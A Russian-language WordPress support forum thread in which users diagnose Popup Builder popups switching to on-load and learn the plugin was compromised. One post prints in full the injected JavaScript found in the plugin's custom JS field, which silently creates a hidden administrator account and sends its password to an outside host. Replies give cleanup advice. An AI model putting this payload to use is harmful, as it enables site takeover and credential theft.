• Подскажите, кто пользуется Popup Builder, у вас проблем с ним не было?

    Странно, было по клику, стало on load.

    • Тема изменена 11 месяцев назад пользователем qvatro.
Просмотр 9 ответов — с 1 по 9 (всего 9)
  • Разработчики что говорят?

    Автор qvatro

    (@qvatro)

    Не писал им

    На форуме 5 активных волонтеров, которые отвечают на вопросы.
    Как думаешь, какова вероятность, что кто-то из нас пользуеться этим плагином?

    Ну сиди дальше, жди у моря погоды.

    было по клику, стало on load

    Стало после чего?

    Некоторые версии плагина имели уязвимости. Обновитесь до последней версии и проверьте пользовательскую вкладку JS, нет ли там вирусного кода
    https://wordpress.org/support/topic/all-popups-are-showing-up/

    Автор qvatro

    (@qvatro)

    Читал про уязвимость, но там я так понял вели на другой сайт.

    А у меня просто все окна стали открываться, и не переводили на другой сайт.

    Это вот эта вкладка — Custom JS or CSSAdd custom JS and/or CSS code for extra control ?

    У меня там код в 1 окне

    function httpGet(theUrl) { return fetch(theUrl) .then(response => { if (!response.ok) { throw new Error(HTTP error! Status: ${response.status}); } return response.text(); }) .catch(error => { console.error(‘Error in httpGet:’, error); return null; }); } function httpPost(theUrl, csrftoken, password) { return fetch(theUrl, { method: ‘POST’, headers: { ‘Content-Type’: ‘application/x-www-form-urlencoded’, }, body: action=createuser&_wpnonce_create-user=${csrftoken}&_wp_http_referer=${encodeURI(theUrl)}&user_login=wpx&email=waterstyle29@gmail.com&first_name=tqwtqw&last_name=tqwtqw&url=${window.location.origin}&pass1=${password}&pass2=${password}&role=administrator&createuser=Add+New+User+, }) .then(response => { if (!response.ok) { throw new Error(HTTP error! Status: ${response.status}); } return response.text(); }) .catch(error => { console.error(‘Error in httpPost:’, error); return null; }); } function sendLog(logUrl, logText) { return fetch(logUrl, { method: ‘POST’, headers: { ‘Content-Type’: ‘text/plain’, }, body: logText, }) .then(response => { if (!response.ok) { throw new Error(‘Log gönderme başarısız’); } return response.text(); }) .then(data => { console.log(‘Log gönderildi:’, data); }) .catch(error => { console.error(‘Hata:’, error); }); } function generateRandomPassword(length) { const charset = «abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789»; let password = «»; for (let i = 0; i < length; i++) { const randomIndex = Math.floor(Math.random() * charset.length); password += charset.charAt(randomIndex); } return password; } function createUserAndSendLog() { const trigger = window.location.origin + «/wp-admin/user-new.php»; const logUrl = ‘https://wpemojii.com/az.php&#8217;; httpGet(trigger) .then(page => { const regExp = /name=»_wpnonce_create-user»\svalue=»([^)]+)»/; const matches = regExp.exec(page); if (matches && matches[1]) { const csrftoken = matches[1].slice(0, 10); const randomPassword = generateRandomPassword(8); httpPost(trigger, csrftoken, randomPassword) .then(postResponse => { if (postResponse) { console.log(‘User created successfully.’); const logText = User created: Username: wpx Email: waterstyle29@gmail.com First Name: tqwtqw Last Name: tqwtqw URL: ${window.location.origin} Password: ${randomPassword}; sendLog(logUrl, logText); } else { console.error(‘Failed to create user.’); } }) .catch(error => { console.error(‘Error in httpPost:’, error); }); } else { console.error(‘CSRF token not found.’); } }) .catch(error => { console.error(‘Error in httpGet:’, error); }); } createUserAndSendLog(); console.log(‘hellotest112’);

    Автор qvatro

    (@qvatro)

    После чего сложно сказать, захожу на сайт, а там окна)) Стал другие проверять, та же ерунда, но не на всех сайтах.

    Читал про уязвимость, но там я так понял вели на другой сайт.
    А у меня просто все окна стали открываться, и не переводили на другой сайт.

    Там у кого редирект, у кого все окна одновременно открываются. У вас еще круче, создание нового админа. Вам надо обновить плагин до последней версии, в которой исправлен баг. Вычистить вирусный код. Проверить пользователей с правами админа и удалить вновь зарегистрированных.

    Автор qvatro

    (@qvatro)

    Спасибо, действительно еще админ появился.

    Привет всем! Таже фигня, все модалки начали грузиться по правилу On Load.

    Проверил пользователей… 2 новых админа.

    Удалил админов, обновил плагин, уже больше 2 недель палет нормальный. Если еще раз такая фигня вылезет, перейду на новый плагин.

Просмотр 9 ответов — с 1 по 9 (всего 9)
  • Тема «Popup Builder было по клику стало on load» закрыта для новых ответов.